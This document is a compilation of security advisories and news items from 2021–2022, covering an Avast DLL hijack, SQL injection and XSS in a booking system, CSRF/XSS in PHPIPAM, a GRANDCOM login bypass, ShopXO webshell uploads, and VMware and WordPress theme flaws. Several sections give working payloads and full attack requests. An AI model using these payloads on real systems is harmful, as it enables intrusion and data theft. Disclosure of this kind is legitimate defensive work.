Multiple DLL hijacking vulnerabilities via the components instup.exe and wsc_proxy.exe in Avast Premium Security before v21.11.2500 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via a crafted DLL file.

**CVE-2022-AVAST2 (Self-Defense Bypass via Repairing Function)****Product**

Avast - Premium Security

**Version**

21.11.2500 (build 21.11.6809.528)

**Vulnerable Component**

"instup.exe" and "wsc\_proxy.exe"

**Description**

It was noted that there is security checking to prevent some of the Avast processes from loading of undesired/unsigned DLLs via DLL hijacking attack.

However, It was noted that there are two Avast processes "instup.exe" and "wsc\_proxy.exe" which are vulnerable to DLL hijacking vulnerability. These processes will attempt to load an non-existing DLL (i.e., wbemcomn.dll) from "C:\\Windows\\System32\\wbem" when "REPAIR APP" function is triggered. Due to the lack of security checking within these two processes, attackers who have administrative privilege could drop a malicious version of "wbemcomn.dll" and get it loaded by the affected Avast processes.

Since those vulnerable components are Avast protected processes, attacker could inject malicious code to control the Avast protected processes for malicious purposes such as deactivating the antivirus and staging malware.

**Impact**

The vulnerability allows an attacker with administrative privilege to execute malicious code within Avast process, terminate the Avast antivirus regardless of "Self-Defense" protection and cause DOS to the affected system.

**Steps to reproduce**

1.  Install Avast Premium Security (version 21.11.2500)
2.  Open a Administrative CMD prompt and copy the malicious version of "wbemcomm.dll" to "C:\\Windows\\System32\\wbem"
3.  Open Avast Premium Security GUI -> Menu -> Settings -> Troubleshooting -> Click on "REPAIR APP"
4.  Wait for a while and the malicious "wbemcomm.dll" will be loaded by "instup.exe" and "wsc\_proxy.exe" (see poc.png)

**Resolution**

This vulnerability is patched since Avast Premium Security 22.2.

**Disclosure Timeline**

20-01-2022 Vulnerability reported to Avast.

11-02-2022 Avast confirmed the vulnerability and released a patch for the product.

**References**

https://forum.avast.com/index.php?topic=318305.0

CVE-2022-28965: Vulnerability-Disclosure/CVE-2022-AVAST2 at main · netero1010/Vulnerability-Disclosure

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=delete_client.

    #### Title: Online Sports Complex Booking System 1.0 SQL Injection#### Author: Zllggggg#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip####  Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md#### Tested on: Windows, MySQL, ApacheAfter entering the background, click the registered clients navigation, select a piece of data and click delete[image: 1648884355.jpg]Find the corresponding source code and find that the ID parameter passed bypost does not have any filtering[image: 1648884613.jpg]The vulnerability is also verified in sqlmap [image: 1648884408.jpg]Data packet```POST /scbs/classes/Users.php?f=delete_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 4Origin: http://localhostConnection: closeReferer: http://localhost/scbs/admin/?page=clientsCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=2```Payload```Parameter: id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND'aPSM'='aPSM---```

CVE-2022-28962: Online Sports Complex Booking System 1.0 SQL Injection ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client.

    Title: Online Sports Complex Booking System 1.0 XSSAuthor: ZllgggggVendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.htmlSoftware: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zipReference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.mdTested on: Windows, MySQL, ApacheDescription:When registering users at the front desk, when we fill in the information,we use burpsuite to catch the data packet,After obtaining the data packet,modify the email parameter to <script>alert(1)</script> then send thepacket,Then log in to the background with the administrator account ,Clickregistered clients to trigger the pop-up windowData packetPOST /scbs/classes/Users.php?f=save_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------289647566033806702832762971625Content-Length: 1284Origin: http://localhostConnection: closeReferer: http://localhost/scbs/register.phpCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="id"1-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="firstname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="middlename"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="lastname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="gender"Male-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="contact"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="address"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="email"<script>alert(1)</script>-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="password"123-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------289647566033806702832762971625--

CVE-2022-29652: Online Sports Complex Booking System 1.0 Cross Site Scripting ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_ Facility.

**Title: Online Sports Complex Booking System 1.0 SQL Injection****Author: Zllggggg****Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html****Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs\_1.zip****Tested on: Windows, MySQL, Apache**

After the program is installed, enter the background, find the facility list in the right navigation bar, select a piece of data, and click the delete button 

According to the submission path /classes/master.php?f=delete\_ Facility, Find delete\_facility(),The ID parameter does not have any filtering,Therefore, SQL injection is caused 

Because the parameters are submitted in post mode,Use burpsuite to intercept and save it as a TXT file,Then use sqlmap to verify sqlmap -r 2.txt 

Data packet

    POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 4
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/scbs/admin/?page=facilities
    Cookie:PHPSESSID=t261ncguifvbucmfe31v6l74km
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    id=1
    

Payload

    Parameter: id (POST)
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF

CVE-2022-29304: Exploit-/Online Sports Complex Booking System 1.0 SQL Injection(三).md at main · playZG/Exploit-

PHPIPAM version 1.4.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

=====[ Tempest Security Intelligence - ADV-03/2022  
]==========================

PHPIPAM - Version 1.4.4

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents ]==================================================

* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References

=====[ Vulnerability Information  
]=============================================

* Class: Improper Neutralization of Input During Web Page Generation  
('Cross-Site Scripting') [CWE-79]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

* Class: Cross-Site Request Forgery (CSRF) [CWE-352]  
* CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

=====[ Overview ]========================================================

 * System affected: PHPIPAM - Version 1.4.4  
 * Software Version: Version 1.4.4 (other versions may also be affected).  
 * Impact: PHPIPAM 1.4.4 is vulnerable to Cross-Site Request Forgery (CSRF)  
and Cross-Site Scripting (XSS) via  
app/admin/subnets/find_free_section_subnets.php. An attacker can exploit  
this by injecting javascript code to coerce an admin user into performing  
unintended actions.

=====[ Detailed description  
]=================================================

The html codes below exploit vulnerabilities in the same way due to the  
fact that both forms do not contain CSRF tokens and are vulnerable to XSS  
attacks. Then an attacker can host the forms on their malicious host and  
trick an administrator into visiting your page. If successful, the  
javascript code will execute.

* [app/admin/subnets/find_free_section_subnets.php]

<html>  
  <body>  
    <h1> Exploit PHPIPAM </h1>  
  <script>history.pushState('', '', '/')</script>  
    <form action="  
http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php"  
method="POST">  
      <input type="hidden" name="container" value="body" />  
      <input type="hidden" name="placement" value="top" />  
      <input type="hidden" name="sectionid" value="2'><input  
onpointerleave="alert(1)">rodnt</input><script>alert('incogbyte')</script>"  
/>  
      <input type="hidden" name="original-title" value="Search for free  
subnets in section " />  
      <input type="submit" value="Exploit" />  
    </form>  
  </body>  
</html>

=====[ Timeline of disclosure  
]===============================================

13/Jan/2022 - Responsible disclosure was initiated with the vendor;

14/Jan/2022 - PHPIPAM confirmed the issues;

17/Jan/2022 - The vendor fixed the issues XSS and CSRF;

24/Mar/2022 - CVE reserved as CVE-2021-46426;

25/Mar/2022 - CVE assigned [5].

=====[ Thanks & Acknowledgements ]========================================

* Tempest Security Intelligence [4]

=====[ References ]=====================================================

[1] [  
https://cwe.mitre.org/data/definitions/352.html|https://cwe.mitre.org/data/definitions/352.html  
]

[2] [  
https://cwe.mitre.org/data/definitions/79.html|https://cwe.mitre.org/data/definitions/79.html  
]

[3] [  
https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351|https://github.com/phpipam/phpipam/commit/6c1f72816d6ac634e9c174057e008717d959f351  
]

[4] [https://www.tempest.com.br|https://www.tempest.com.br/]

[5] [  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46426  
]

[6][ Thanks to Celso (CGB) =)]

=====[ EOF ]===========================================================

--

PHPIPAM 1.4.4 Cross Site Request Forgery / Cross Site Scripting

GRANDCOM DynWEB before 4.2 contains a SQL Injection vulnerability in the admin login interface. A remote unauthenticated attacker can exploit this vulnerability to obtain administrative access to the webpage, access the user database, modify web content and upload custom files. The backend login script does not verify and sanitize user-provided strings.

**Authentication Bypass in GRANDCOM CMS**

*   Vendor Homepage: https://www.grandcom.sk/
*   Affected Version: 4.2 and older

SQL injection vulnerability in GRANDCOM CMS allows remote unauthenticated attackers to bypass authentication via a crafted username during a login attempt. Any unauthorized user with access to the application is able to exploit this vulnerability.

> SQL Injection attack consists of inserting an SQL query through the input data from the client into the application. Upon successful misuse, it is possible to retrieve detailed data from the database, edit database data such as inserting, updating or deleting data, work with administrative operations in the database, or in some situations run commands directly on the operating system.

**Steps to reproduce**

1.  Visit the following resource /admin/index.php.
2.  Enter the below mentioned credentials in the vulnerable field:

*   username: admin' -- -
*   password: _anything_

5.  Press the **Login** button, this will result in a successful Authentication Bypass.

**Remediation**

*   Use of Prepared Statements (with Parameterized Queries)
*   Use of Stored Procedures
*   Allow-list Input Validation
*   Escaping All User Supplied Input

Discovered by Martin Kubecka, July 19, 2021.

CVE-2021-37413: CVE-References/CVE-2021-37413.md at main · martinkubecka/CVE-References

CISA orders US federal agencies to implement patches ASAP

John Leyden 19 May 2022 at 15:14 UTC

CISA orders US federal agencies to implement patches ASAP

US Federal agencies have been instructed to either immediately patch or temporarily deactivate a set of enterprise products from VMware in response to “active and expected exploitation of multiple vulnerabilities”.

An emergency directive from the US Cybersecurity and Infrastructure Security Agency (CISA) urges patching of VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

If prompt patching is impractical then federal agencies are instructed to remove instances of vulnerable products from agency networks.

**Act fast**

Attackers have reverse engineered recently disclosed software vulnerabilities in the various VMware products in order to develop exploits and attack unpatched systems.

The tactic has already resulted in active exploitation of CVE-2022-22954 and CVE-2022-22960, with more abuse along the same lines likely to follow.

YOU MIGHT ALSO LIKE Popular websites leaking user email data to web tracking domains

“Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022,” an alert from the agency warns.

In a related advisory issued by VMware on Wednesday (May 18), the vendor explained that it had patched an authentication bypass vulnerability (CVE-2022-22972) and a local privilege escalation vulnerability (CVE-2022-22973) involving VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

The CVE-2022-22954 vulnerability already under active attack involves a server-side template injection vulnerability in VMware Workspace ONE Access and Identity Manager that poses a remote code execution risk. The flaw earned a CVSS score of 9.8, close to the maximum possible.

Catch up on the latest cyber-attack news

The CVE-2022-22960 flaw involves a lesser but still high-risk privilege escalation vulnerability involving VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

Both flaws have come under active attack, just days after the release of patches, security vendor Barracuda Networks reports:

The vast majority of the attacks came in from the US geographically, with most of them coming in from data centers and cloud providers. While the spikes are largely from these IP ranges, there are also consistent background attempts from known bad IPs in Russia. Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes.

The motive behind the attacks remains unclear.

Although the unusual emergency action advisory is primarily directed at US federal agencies, CISA is urging other enterprise organizations to either update or remove installations of the affected products from their networks.

Vulnerable, internet-accessible installations of affected products should be treated as already potentially compromised, CISA adds.

RECOMMENDED Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw

Active attacks against VMware flaws prompts emergency update directive

An issue was discovered in ShopXO CMS 2.2.0. After entering the management page, there is an arbitrary file upload vulnerability in three locations.

Affects version shopxo 2.2.0  
After entering the management page as admininstrator there is an arbitrary file upload vulnerability in 3 locations , you can upload webshell into the site.

**The first location:**

网站管理->主题管理->主题安装  
the post url is /admin.php?s=theme/upload.html  
the step is:

1.  download the default theme from offical(https://shopxo.store/goods-80.html)
2.  unzip the zip
3.  Only delete files with "php" suffix due to file security check, new a evil file named phpinfo.pHp or phpinfo.phtml in the "css" folder and the root folder  
      
    
4.  Recompress the file as a new zip file
5.  upload it  
    you will find the evil file is in public/static/index/<your renamed folder name>/css/phpinfo.pHp and app/index/view/<your renamed folder name>/phpinfo.pHp  
    

**The second location:**

应用中心->应用管理->上传应用  
the post url is /admin.php?s=pluginsadmin/upload.html  
like the first location

1.  download a casual plugin from offical(https://shopxo.store/goods-75.html) like this
2.  unzip the zip
3.  new a evil file named phpinfo.php in the _controller_-><pluginname>->admin folder
4.  Recompress the file as a new zip file
5.  upload it

you will find the evil file is in app/plugins/freightfee/admin/phpinfo.php

**The third location:**

手机管理->小程序列表->主题安装  
the post url is /admin.php?s=appmini/themeupload.html

the step is

1.  new a evil file phpinfo.php and compress the file as a new zip file
2.  upload it

you will find the evil file in sourcecode/weixin/phpinfo.php

CVE-2021-41938: After entering the management page，there is an arbitrary file upload vulnerability in 3 locations · Issue #64 · gongfuxiang/shopxo

Privilege escalation flaw discovered in the Jupiter and JupiterX Core Plugin affects more than 90,000 sites.

Privilege escalation flaw discovered in the Jupiter and JupiterX Core Plugin affects more than 90,000 sites.

A critical privilege escalation flaw found in two themes used by more than 90,000 WordPress sites can allow threat actors to take over the sites completely, researchers have found.

WordFence Threat Intelligence Team researcher Ramuel Gall discovered the flaw, one of five vulnerabilities he found between early April and early May in the Jupiter and JupiterX Premium WordPress themes, he revealed in a blog post published Wednesday.

One of the flaws—tracked as CVE-2022-1654 and rated as 9.9, or critical on the CVSS–allows for “any authenticated attacker, including a subscriber or customer-level attacker, to gain administrative privileges and completely take over any site running either the Jupiter Theme or JupiterX Core Plugin,” he wrote. The plugin is required to run the JupiterX theme.  

Affected versions of the themes are: Jupiter Theme 6.10.1 or earlier, and JupiterX Core Plugin 2.0.7 or earlier.

WordFence finished their investigation of most of flaws on April 5 and reported them to the Jupiter and JupiterX theme developer ArtBees on the same day; on May 3 they notified the developer of an additional Jupiter theme flaw. By May 10, the developed had released updated versions of both the Jupiter and JupiterX themes that had patched all the flaws.

****Critical Vulnerability****

The critical flaw found resides in a function, uninstallTemplate, which is intended to reset a site after a template is uninstalled. However, it “has the additional effect of elevating the user calling the function to an administrator role,” Gall wrote. In the Jupiter theme, the function is found in the theme itself; in JupiterX, it’s present in the JupiterX Core plugin.

“Vulnerable versions register AJAX actions but do not perform any capability checks or nonce checks,” he wrote.

On a site with a vulnerable version of the Jupiter Theme installed, any logged-in user can elevate their privileges to those of an administrator by sending an AJAX request with the action parameter set to abb\_uninstall\_template. This calls the uninstallTemplate function, which calls the resetWordpressDatabase function, which effectively reinstalls the site with the currently logged-in user as the new site owner, Gall explained.

On a site where a vulnerable version of the JupiterX Core plugin is installed, someone can access the same functionality by sending an AJAX request with the action parameter set to jupiterx\_core\_cp\_uninstall\_template, he said.

****Other Vulnerabilities****

WordPress plugins, often developed by third-party developers, are notoriously buggy. Previous flaws found in plugins for the popular website-creation and -hosting platform also have allowed for site takeover, as well as enabled WordPress subscribers to totally wipe sites not belonging to them, or attackers to forge emails to subscribers.

Of the other flaws that Gall discovered, three—tracked as CVE-2022-1656, CVE-2022-1658 and CVE-2022-1659–are rated as medium risk and one, CVE-2022-1657 is rated as high risk.

The high-risk flaw, which affects JupiterX Theme 2.0.6 or earlier and Jupiter Theme 6.10.1 or earlier, can allow an attacker to obtain privileged information, such as nonce values, or perform restricted actions, Gall explained. This can be done by including and executing files from any location on the site.

“Vulnerable versions of the Jupiter and JupiterX Themes allow logged-in users, including subscriber-level users, to perform Path Traversal and Local File inclusion,” Gall explained.

In the JupiterX theme, this can be done by using the jupiterx\_cp\_load\_pane\_action AJAX action present in the lib/admin/control-panel/control-panel.php file to call the load\_control\_panel\_pane function. “It is possible to use this action to include any local PHP file via the slug parameter,” Gall wrote.

The Jupiter theme has a nearly identical vulnerability, which an attacker can exploit via the mka\_cp\_load\_pane\_action AJAX action present in the framework/admin/control-panel/logic/functions.php file, which calls the mka\_cp\_load\_pane\_action function, he said.

Wordfence researchers recommend that anyone using the affected themes updated to the patched versions immediately. The company released a firewall rule to protect Wordfence Premium, Wordfence Care and Wordfence Response customers on April 5, and free Wordfence users on May 4.

Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover

Reflected Cross-Site Scripting (XSS) vulnerability in Code Snippets plugin <= 2.14.3 at WordPress via &orderby vulnerable parameter.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Code Snippets is an easy, clean and simple way to run code snippets on your site. It removes the need to add custom snippets to your theme’s functions.php file.

A snippet is a small chunk of PHP code that you can use to extend the functionality of a WordPress-powered website; essentially a mini-plugin with less load on your site.  
Most snippet-hosting sites tell you to add snippet code to your active theme’s functions.php file, which can get rather long and messy after a while.  
Code Snippets changes that by providing a GUI interface for adding snippets and **actually running them on your site** just as if they were in your theme’s functions.php file.

Code Snippets provides graphical interface, similar to the Plugins menu, for managing snippets. Snippets can be activated and deactivated, just like plugins. The snippet editor includes fields for a name, a visual editor-enabled description, tags to allow you to categorize snippets, and a full-featured code editor. Snippets can be exported for transfer to another site, either in JSON for later importing by the Code Snippets plugin, or in PHP for creating your own plugin or theme.

If you have any feedback, issues, or suggestions for improvements please leave a topic in the Support Forum, or join the community on Facebook.

If you like this plugin, or it is useful to you in some way, please consider reviewing it on WordPress.org.

If you’d like to contribute to the plugin’s code or translate it into another language, you can fork the plugin on GitHub.

**Translations**

Code Snippets can be used in these different languages thanks to the following translators:

*   Belarusian – Hrank.com
*   Brazilian Portuguese – Bruno Borges
*   Chinese – Jincheng Shan and 诗语
*   Chinese (Taiwan) – Alex Lion and Chun-Chih Cheng
*   Croatian – Borisa Djuraskovic from Web Hosting Hub
*   Czech – Lukáš Tesař and Jakub Humpolec
*   Danish – Finn Sommer Jensen
*   Dutch – Sander Spies, Peter Smits and mother.of.code.a11n
*   English (New Zealand) and English (UK) – webaware
*   English (South Africa) – webaware and Ian Barnes
*   French – momo-fr, Didier Demory, Cyrille Sanson and Shea Bunge
*   French (Canada) – Dominic Desbiens
*   German – Mario Siegmann, Joerg Knoerchen, David Decker and Andreas
*   Greek – Konstantinos Megas and Toni Bishop from Jrop
*   Indonesian – Jordan Silaen from ChameleonJohn.com
*   Italian – Usman Wagan, Luisa Ravelli and ElectricFeet
*   Japanese – mt8, Takakazu Nagaya, Naoko Takano and melvas
*   Persian – Mohammad Novintanon
*   Russian – Alexander Samsonov, Yui, Denis Yanchevskiy and krioteh
*   Slovak – Ján Fajčák
*   Spanish (Colombia) and Spanish (Ecuador) – Javier Esteban
*   Spanish (Spain) – Ibidem Group, Javier Esteban, Fernando Tellado and Juanma Aranda
*   Spanish (Venezuela) – Yordan Soares
*   Swedish – Argentum, Fredrik and Tor-Bjorn Fjellner
*   Urdu – Samuel Badree
*   Vietnamese – Tuan Phan

**Automatic installation**

1.  Log into your WordPress admin
2.  Click **Plugins**
3.  Click **Add New**
4.  Search for **Code Snippets**
5.  Click **Install Now** under “Code Snippets”
6.  Activate the plugin

**Manual installation**

1.  Download the plugin
2.  Extract the contents of the zip file
3.  Upload the contents of the zip file to the wp-content/plugins/ folder of your WordPress installation
4.  Activate the Code Snippets plugin from ‘Plugins’ page.

Network Activating Code Snippets through the Network Dashboard will enable a special interface for running snippets across the entire network.

A full list of our Frequently Asked Questions can be found at help.codesnippets.pro.

**How can I recover my site if it is crashed by a buggy snippet?**

You can recover your site by enabling the Code Snippets safe mode feature. Instructions for how to turn it on are available here: https://help.codesnippets.pro/article/12-safe-mode.

**Will I lose my snippets if I change the theme or upgrade WordPress?**

No, the snippets are stored in the WordPress database, independent of the theme and unaffected by WordPress upgrades.

**Can the plugin be completely uninstalled?**

If you enable the ‘Complete Uninstall’ option on the plugin settings page, Code Snippets will clean up all of its data when deleted through the WordPress ‘Plugins’ menu. This includes all stored snippets. If you would like to preserve the snippets, ensure they are exported first.

**Can I copy snippets that I have created to another WordPress site?**

Yes! You can individually export a single snippet using the link below the snippet name on the ‘Manage Snippets’ page or bulk export multiple snippets using the ‘Bulk Actions’ feature. Snippets can later be imported using the ‘Import Snippets’ page by uploading the export file.

**Can I export my snippets to PHP for a site where I’m not using the Code Snippets plugin?**

Yes. Click the checkboxes next to the snippets you want to export, and then choose **Export to PHP** from the Bulk Actions menu and click Apply. The generated PHP file will contain the exported snippets’ code, as well as their name and description in comments.

**Can I run network-wide snippets on a multisite installation?**

You can run snippets across an entire multisite network by **Network Activating** Code Snippets through the Network Dashboard. You can also activate Code Snippets just on the main site, and then individually on other sites of your choice.

**Where are the snippets stored in my WordPress database?**

Snippets are stored in the wp_snippets table in the WordPress database. The table name may differ depending on what your table prefix is set to.

**Where can I go for help or suggest new features?**

You can get help with Code Snippets, report bugs or errors, and suggest new features and improvements either on the WordPress Support Forums or on GitHub

**How can I help contribute to the development of the Code Snippets plugin?**

The best way to do this is to fork the repository on GitHub and send a pull request.

Works perfectly, and safely

Un plugin sencillo, efectivo y limpio. Gracias.

Hi, Firstly it works very well as it is expected. The only thing I did’nt find is how register a new label. As I write a new label it is not registered Thanks a lot for the job

I've been using this plugin for years and I really like its features. Yes, you can disable your site very easily by injecting PHP code, but that is not the fault of the plugin; with great power comes great responsibility.

Read all 366 reviews

“Code Snippets” is open source software. The following people have contributed to this plugin.

Contributors

**3.1.0 (17 May 2022)**

*   Fixed: Caching inconsistencies preventing snippets and settings from refreshing on sites with persistent object caching.
*   Improved: Simplified database queries.
*   Added: More comprehensive cache coverage, including for active snippets.
*   Added: Icon to ‘Go Pro’ button indicating it opens an external tab.
*   Improved: Allow display styles in snippet descriptions.

**3.0.1 (14 May 2022)**

*   Fixed: Incompatibility issue with earlier versions of PHP.

**3.0.0 (14 May 2022)**

**Added**

*   Added: HTML content snippets for displaying as shortcodes or including in the page head or footer area.
*   Added: Notice reminding users to upgrade unsupported PHP versions.
*   Added: Visual settings to add attributes to shortcodes.
*   Added: Shortcode buttons to the post and page content editors.
*   Added: Basic REST API endpoints.
*   Added: Snippet type column to the snippets table.
*   Added: Snippet type badges to Edit and Add New Snippet pages.
*   Added: Setting to control whether the current line of the code editor is highlighted.
*   Added: Display a warning when saving a snippet with missing title or code.
*   Added: Add suffix to title of cloned snippets.

**Changed**

*   Improved: Updated plugin code to use namespaces, preventing name collisions with other plugins.
*   Improved: Added key for the ‘active’ and ‘scope’ database table columns to speed up queries.
*   Improved: Redirect from edit menu if not editing a valid snippet.
*   Improved: Moved activation switch into its own table column.
*   Improved: Updated code documentation according to WordPress standards.
*   Improved: Added snippet type labels to the tabs on the Snippets page.
*   Improved: Split settings page into tabs.
*   Improved: Use the version of CodeMirror included with WordPress where possible to inherit the additional built-in features.
*   Improved: Added hover effect to priority settings in the snippets table to show that they are editable.
*   Fixed: Snippets table layout on smaller screens.

**Deprecated**

*   Removed: Deprecated functions and compatibility code for unsupported PHP versions.
*   Removed: Option to disable snippet scopes.

**New in Pro**

*   Added: CSS style snippets for the site front-end and admin area.
*   Added: JavaScript snippets for the site head and body area on the front-end.
*   Added: Browser cache versioning for CSS and JavaScript snippets.
*   Added: Support for exporting and downloading CSS and JavaScript snippets.
*   Added: Support for highlighting code on the front-end.
*   Added: Editor syntax highlighting for CSS, JavaScript and HTML snippets.
*   Added: Button to preview full file when editing CSS or JavaScript snippets.
*   Added: Option to minify CSS and JavaScript snippets.
*   Added: Gutenberg editor block for displaying content snippets.
*   Added: Gutenberg editor block for displaying snippet source code.
*   Added: Elementor widget for displaying content snippets.
*   Added: Elementor widget for displaying snippet source code.

**2.14.6 (13 May 2022)**

*   Fixed: Issue with processing uploaded import files.
*   Fixed: Issue with processing tag filters.

**2.14.5 (10 May 2022)**

*   Fixed: Incompatibility issue with older versions of PHP.

**2.14.4 (5 May 2022)**

*   Fixed: Prevent array key errors when loading the snippet table with unknown order values.

**2.14.3 (10 Dec 2021)**

*   Fixed: Potential security issue outputting snippets-safe-mode query variable value as-is. Thanks to Krzysztof Zając for reporting.

**2.14.2 (9 Sep 2021)**

*   Fixed: Prevent network snippets table from being created on single-site installs.
*   Added translations:
    *   Spanish by Ibidem Group
    *   Urdu by Samuel Badree
    *   Greek by Toni Bishop from Jrop
*   Added: Support for :class syntax to the code validator.
*   Added: PHP8 support to the code linter.
*   Added: Color picker feature to the code editor.
*   Added: Failsafe to prevent multiple versions of Code Snippets from running simultaneously.

**2.14.1 (10 Mar 2021)**

*   Added: Czech translation by Lukáš Tesař.
*   Fixed: Code validator now supports function_exists and class_exists checks.
*   Fixed: Code validator now supports anonymous functions.
*   Fixed: Issue with saving the hidden columns setting.
*   Fixed: Replaced the outdated tag-it library with tagger for powering the snippet tags editor.
*   Added: Code direction setting for RTL users.
*   Updated CodeMirror to version 5.59.4.
*   Added: Additional action hooks and search API thanks to @Spreeuw.

**2.14.0 (26 Jan 2020)**

*   Updated CodeMirror to version 5.50.2.
*   Added: Basic error checking for duplicate functions and classes.
*   Updated Italian translations to fix display issues – thanks to Francesco Marino.
*   Fixed: Ordering snippets in the table by name will now be case-insensitive.
*   Added: Additional API options for retrieving snippets.
*   Fixed: Code editor will now properly highlight embedded HTML, CSS and JavaScript code.
*   Changed the indicator color for inactive snippets from red to grey.
*   Fixed a bug preventing the editor theme from being set to default.
*   Added: Store the time and date when each snippet was last modified.
*   Added: Basic error checking when activating snippets.
*   Fixed: Ensure that imported snippets are always inactive.
*   Fixed: Check the referer on the import menu to prevent CSRF attacks. Thanks to Chloe with the Wordfence Threat Intelligence team for reporting.
*   Fixed: Ensure that individual snippet action links use proper verification.

**2.13.3 (13 Mar 2019)**

*   Added: Hover effect to activation switches.
*   Added: Additional save buttons above snippet editor.
*   Added: List save keyboard shortcuts to the help tooltip.
*   Added: Change “no items found” message when search filters match nothing.
*   Fixed: Calling deprecated code in database upgrade process.
*   Fixed: Include snippet priority in export files.
*   Fixed: Use Unix newlines in code export file.
*   Updated CodeMirror to version 5.44.0.
*   Fixed: Correctly register snippet tables with WordPress to prevent database repair errors \[#\]
*   Fixed: CodeMirror indentation settings being applied incorrectly

**2.13.2 (25 Jan 2019)**

*   Removed potentially problematic cursor position saving feature

**2.13.1 (22 Jan 2019)**

*   Added: Add menu buttons to settings page for compact menu
*   Updated: French translation updated thanks to momo-fr
*   Fixed: Split code editor and tag editor scripts into their own files to prevent dependency errors
*   Fixed: Handling of single-use shared network snippets
*   Fixed: Minor translation template issues
*   Added: Help tooltop to snippet editor for keyboard shortcuts, thanks to Michael DeWitt
*   Improved: Added button for executing single-use snippets to snippets table
*   Added: Sample snippet for ordering snippets table by name by default
